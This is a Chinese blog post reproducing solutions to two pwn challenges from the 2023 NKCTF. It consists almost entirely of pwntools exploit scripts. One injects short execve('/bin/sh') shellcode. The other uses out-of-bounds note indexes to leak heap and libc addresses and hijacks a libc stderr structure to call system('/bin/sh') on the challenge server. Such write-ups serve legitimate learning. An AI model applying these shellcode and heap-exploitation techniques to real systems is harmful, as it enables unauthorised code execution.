---
title: 2023 NKCTF pwn 复现
date: 2023-04-08 21:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=59/
pin: false
published:
---

## **9961code**

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("","")
p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
# context.terminal = ['tmux', 'splitw', '-hp','64']


def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

shellcode = """
	xor rsi, rsi
	lea rdi, [r15 + 0xe]
	cdq
	mov ax, 59
	syscall
"""
ru("In that case, you can only enter a very short shellcode!\n")
s(asm(shellcode)+"/bin/sh")

ia()
```

## note

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

p = remote("ctf.comentropy.cn","8304")
# p = process("./nk_note")
elf = ELF("./nk_note")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']


def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

def add(idx,size,con):
    sla("your choice: ",1)
    sla("Index: ",idx)
    sla("Size: ",size)
    p.sendafter("Content: ",con)

def edit(idx,size,con):
    sla("your choice: ",2)
    sla("Index: ",idx)
    sla("Size: ",size)
    p.sendafter("Content: ",con)

def dele(idx):
    sla("your choice: ",3)
    sla("Index: ",idx)

def show(idx):
    sla("your choice: ",4)
    sla("Index: ",idx)

free = 0x523E
ptr = 0x40A0

add(0,0x10,'aaa')
edit(0,0x1e0,'a'*0x1e0)
show(0)
ru('a'*0x1e0)
heap_base = uu64()
lg("heap_base")


edit(0x207,0x10,'a'*9)
show(0x207)
libc_base = l64()-0x09a761
lg("libc_base")
edit(0x207,0x10,'\x00'*9)

stderr_use = libc_base + 0x098120
system_addr = libc_base + 0x43c7c

add(1,0x7d0,'aaa')
add(1,0x7d0,'aaa')
add(1,0x7d0,'aaa')
add(1,0x7d0,'aaa')
edit(0x10,0x10,'a'*0x10)
show(0x10)
ru('a'*0x10)
base = uu64()-0x4120
lg("base")
edit(0x10,0x10,p64(heap_base-0x0001b8)*2)

# dbg()
edit(1,0x10,p64(stderr_use))
edit(0x14,0x50,"/bin/sh\x00"+"A"*0x20+p64(1)+'a'*8+p64(0)+'a'*8+p64(system_addr))

sl(5)

ia()
```
